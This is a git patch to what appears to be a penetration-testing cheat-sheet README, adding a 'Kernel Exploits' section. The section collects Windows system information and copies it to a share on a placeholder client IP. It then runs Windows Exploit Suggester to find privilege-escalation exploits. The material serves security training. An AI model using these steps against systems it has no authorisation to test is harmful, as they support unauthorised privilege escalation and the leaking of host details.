From 7d9ff3d776d0831c4f9544600118a00b8851555f Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Fri, 2 Sep 2022 20:14:35 -0400 Subject: [PATCH] Update README.md --- README.md | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/README.md b/README.md index aeff43d..cbb4ec7 100644 --- a/README.md +++ b/README.md @@ -661,6 +661,33 @@ python3 exploit.py
+#### Kernel Exploits + +[Windows Expoit Suggestor](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py) + +```bash +# Find information about system +systeminfo + +# Pipe system information over to client +systeminfo > \\{Client IP ADDRESS}\systeminfo.txt + +# Use Windows exploit suggestor to find availble kernel exploit +python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less + + +``` + + + + + + + + + + + ```bash # Windows Enumeration Commands